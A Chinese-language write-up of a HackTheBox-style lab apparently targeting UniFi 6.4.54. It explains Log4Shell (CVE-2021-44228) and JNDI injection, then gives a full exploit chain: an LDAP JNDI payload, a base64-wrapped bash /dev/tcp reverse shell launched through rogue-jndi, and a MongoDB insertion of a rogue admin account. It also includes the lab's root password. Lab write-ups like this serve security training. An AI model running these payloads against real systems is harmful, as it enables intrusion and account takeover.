TASK1

最早开放的是哪四个端口
22 6789 8080 8443
直接nmap扫描，然后就出来了
其实我也扫描过一些其他的真实的机器
给我最大的感触就是，还是有和很多的服务和协议不了解
每当面临这些东西的时候，总给我一种他漏洞百出而我却找不出来的感觉

TASK2

在端口8443上运行的软件的标题是什么？
通过web访问就可以了 UniFI network

TASK3

正在运行的软件的版本是什么？
这个上面有写
6.4.54

TASK4

漏洞的编号是什么？
cve-2021-44228
log4j的反序列化

TASK5

JNDI在注入中利用了什么协议？LDAP

TASK6

我们使用什么工具拦截流量，表明攻击成功？
Tcpdump

TASK7

我们需要拦截哪个端口的流量
389389端口就收到了数据报文，证明网站存在log4j漏洞

TASK8

MongoDB服务运行在哪个端口上？
第一步就是访问web，然后尝试登录一下
发现有remeber，抓个包

将remeber字段修改成payload
${jndi:ldap://10.10.14.128/o=tomcat}
然后在另起一个终端，使用tcpdump进行抓包
看看是否被请求

这说明是有漏洞的

原理

虽然知道漏洞的利用方法，但是我们还是要了解一下他的原理
Log4j2 远程代码执行漏洞（cve-2021-44228）
1、JNDI、RMI、LDAP、JNDI注入？
要了解本次Log4j2 rce的原理，首先我们得知道什么是JNDI，什么是JNDI注入，什么是RMI，什么又是LDAP…
Java Name and Directory(目录) Interface(接口)：java命名和目录接口
是sun公司提供的一种标准的java命名系统接口，JNDI提供统一的客户端API，通过访问JNDI，根据命名服务或目录服务来获取相应的资源。

命名服务：一种简单的键值对绑定（k，v），可以通过键名检索值，RMI（远程方法调用）就是典型的命名服务。
目录服务：目录服务是命名服务的拓展，区别在于它可以通过对象的属性来检索对象，其实就是键比较复杂，比如找一个学生：年级->班级->姓名来查找，这些东西就是键，但是是层级关系，比较像目录。LDAP（轻量级目录访问协议）就是典型的目录服务。

说白了，其实JNDI只是对各种访问目录服务的逻辑进行了再封装，就是以前访问LDAP和RMI要写的代码差别很大，但是有了JNDI这一层（没有什么是加一层解决不了的，如果有就再加一层），就可以使用JNDI的方式来轻松访问RMI或LDAP服务，访问的代码基本是一样的（参考JDBC连接不同的数据库）

可以简单的将LDAP理解为一个存储目录，里面有我们要的资源，而JNDI就是获取资源的一种途径或者说方式。
如上图所示在访问RMI时只传了一个键foo过去，返回一个对象；
在访问LDAP这种目录服务时，传过去的比较复杂，包含多个键值对，这些键值对就是对象的属性，LDAP根据这些属性来判断返回哪个对象。

基本操作：

发布服务：bind() 将名称绑定到对象中
用名字查找资源：lookup() 通过名字检索执行的对象

JNDI注入：

动态协议转换：JNDI提前有配置初始化环境，设置了属性，但是当lookup()里传进来的参数协议与初始化的Context里配置的协议不一致时，就会动态的进行转换来查找传进去的参数，并且不会报错，所以当参数可控时，攻击者可以通过提供一个恶意的url地址来控制受害者加载攻击者指定的恶意类。

ctx.lookup("rmi://your-server/refObj");// 初始化的 //ctx.lookup("ldap://your-server/cn=bar,dc=test,dc=org");//实际上传进来的

命名引用：Java为了将Object对象存储在Naming（命名）或Directory（目录）服务下，提供了Naming Reference（命名引用）功能，对象可以通过绑定Reference类存储在Naming或Directory服务下，比如RMI、LDAP等。
也就是说存储的V中可以是一个超链接，我们根据K去查找V，找到之后发现是引用就会去引用的地址继续找然后返回相应的资源。

总结：
在LDAP中可以存储外部的资源，叫做命名引用，对应Reference类。比如远程HTTP服务的一个.class文件
如果JNDI客户端基于LDAP服务，找不到相应的资源，就会去LDAP中默认指定的地址请求（初始化配置的），如果是命名引用，会将这个文件下载到本地。
如果下载的.class文件包含无参构造函数或静态代码块，加载的时候会自动执行。因为下载之后会进行自动实例化。

在使用Reference时，我们可以直接将对象传入构造方法中，当被调用时，对象的方法就会被触发，创建Reference实例时几个比较关键的属性：
className：远程加载时所使用的类名；
classFactory：加载的class中需要实例化类的名称；
classFactoryLocation：远程加载类的地址，提供class数据的地址可以是file/ftp/http等协议；

当然，要把一个对象绑定到rmi注册表中（前面提到对象可以通过绑定Reference类存储在Naming或Directory服务下），这个对象需要继UnicastRemoteObject，但是Reference没有继承它，所以我们还需要封装一下它，用 ReferenceWrapper 包裹一下Reference实例对象，这样就可以将其绑定到rmi注册表，并被远程访问到了，demo如下：

Reference refObj = new Reference("refClassName","insClassName","http://ip:port/");
//第一个参数是远程加载时使用的类名，第二个参数是加载的class中需要实例化类的名称，第三个参数是远程class文件存放的地址
ReferenceWrapper refObjWrapper = new ReferenceWrapper(refObj );//进行包装继承
registry.bind("refObj ",refObjWrapper );//发布服务，将键与值绑定起来
当有客户端通过lookup(“refObj”)获取远程对象时，获取的是一个Reference存根（Stub)，由于是Reference的存根，所以客户端会先在本地的classpath中去检查是否存在类refClassName，如果不存在则去指定的url（http://ip:port/refClassName.class）动态加载，并且调用insClassName的无参构造函数，所以可以在构造函数里写恶意代码。当然除了在无参构造函数中写利用代码，还可以利用java的static代码块来写恶意代码，因为static代码块的代码在class文件被加载过后就会立即执行，且只执行一次。
听起来有点绕，其实这个上面也提到过（总结2、3）
流程：

Log4j2 rce原理

首先log4j打印日志有四个级别：debug、info、warn、error，不管哪个方法打印日志，在正常的log处理过程中，对${这两个紧邻的字符做了检测，一旦遇到类似表达式结构的字符串就会触发替换机制。
一旦在log字符串中检测到${}，就会解析其中的字符串尝试使用lookup查询，因此只要能控制log参数内容，就有机会实现漏洞利用。

所以最终还是会去调用JNDI的lookup方法，所以知道JNDI的注入原理就很好理解这次漏洞形成的原因了
Log4j2 rce原理：

修复思路

1、禁止用户请求参数中出现攻击关键字
2、禁止lookup下载远程文件（命名引用）
3、禁止log4j的应用连接外网
4、禁止log4j使用lookup
2.15版本修复方法：
修复后log4j2在jndi lookup中增加了很多限制：
默认不再支持二次跳转（命名引用）的方式获取对象
只有在log4j2.allowedLdapClasses列表中指定的class才能获取
只有远程地址是本地或者在log4j2.allowedLdapHosts列表中指定的地址才能获取

Task 9

What port is the MongoDB service running on?
此后所有的题目都是基于需要拿到目标的shell,而拿到shell的方法是利用CVE漏洞CVE-2021-44228，拿到shell以后，以下为拿到shell的过程：

通过log4j漏洞拿到shell需要借助以下脚本：
https://github.com/veracode-research/rogue-jndi
我们通过以下命令安装脚本并构建好服务器

git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
mvn package

mvn要安装maven
Maven是一个跨平台的项目管理工具。作为Apache组织的一个颇为成功的开源项目，其主要服务于基于Java平台的项目创建，依赖管理和项目信息管理。maven是Apache的顶级项目，解释为“专家，内行”，它是一个项目管理的工具，maven自身是纯java开发的，可以使用maven对java项目进行构建、依赖管理。

出现以下界面说明构建完

接着在命令行中将获取shell的脚本base64编码，注意替换为自己的ip地址
echo 'bash -c bash -i >&/dev/tcp/10.10.14.53/4444 0>&1' | base64

接着使用java将前面生成的base64填入下面的命令，同时记得更换为自己的地址
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuNTMvNDQ0NCAwPiYxCg==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.53"
出现如下界面表示运行成功

本地监听一下4444端口
nc -lnvp 4444
在burpsuite中重新发送一次，注意发送的请求，其中remember中的ip应该是自己的ip，我这个地方又变了是因为我又重新启动了靶机。

此时nc中会拿到目标机器的shell，而且用户是unif，以上步骤的整体操作如下：

接着升级为交互式shell，以方便的进行下一步
script /dev/null -c bash

回到刚刚那个问题：mongodb跑在哪个端口上？27117
ps aux | grep mongo

TASK 10

unifi的默认数据库名是什么？
答案：ace
知道了用户名后，我们可以通过终端连接进数据库

MongoDB 是一个基于分布式文件存储的数据库。由 C++ 语言编写。旨在为 WEB 应用提供可扩展的高性能数据存储解决方案。
mongo --port 27117 ace

TASK11

枚举数据库的所有用户的函数是什么？
db.admin.find()
执行结果如下

TASK 12

问：mongodb中增加数据的函数是什么？
回答：db.admin.insert()

TASK 13

问：mongodb中更新数据的函数是什么？
回答：db.admin.update()

经过上面两个题目，我们大概能猜出来后面的思路是更新最高权限用户的密码，然后进到unifi的后台看看。
在添加用户之前，我们先要生成自己的密码，使用以下命令生成，记得最后是密码，自己更换为自己的。
mkpasswd -m sha-512 pilgrim

db.admin.insert({"email":"pilgrim@localhost.local","last_site_name"default","name":"unifiadmin","time_created":NumberLong(100019800),x_shadow":"$6$tVIuEdsp/Y4m8DBy$Dw6.glWpTSPKyxICzmNy.sSrJ9.EXzTsWb8mHd8z5njxPwZOi9pcGYgIjI0Ee./JFnES17WMLGexOiABG6m0"})

db.admin.insert({
  "email": "pilgrim@localhost.local",
  "last_site_name": "default",
  "name": "unifi-admin",
  "time_created": NumberLong(100019800),
  "x_shadow": "$6$tVIuEdsp/Y4m8DBy$Dw6.glWpTSPKyxICzmNy.sSrJ9.EXzTsWbK8mKHd8z5njxPwZOi9pcGYgIjI0Ee./JFnES17WMLGexOiABG6m0"
})

执行的结果

能看出执行成功，接着查找所以用户，然后获取到刚才添加的用户的objectid。
db.admin.find().forEach(printjson);

查看一下网站的用户的详细信息
db.site.find().forEach(printjson);

将我们插入的用户绑定到这个网站上去，其中的admin_id就是自己添加的用户的id，site_id就是上面获取的id

db.privilege.insert({"admin_id":"623f071e1ab0487109299461","permisions":[],"role":"admin","site_id":"61ce269d46e0fb0012d47ec4"});

接着去后台登录的页面登录刚才的账号，记得账户名是unifi-admin，密码是自己设置的密码。
这个地方要好久好久，等吧，多换几个浏览器试试也行。在setting中能知道root的密码如下：
NotACrackablePassword4U2022
然后ssh登录就行了

创作不易点个赞吧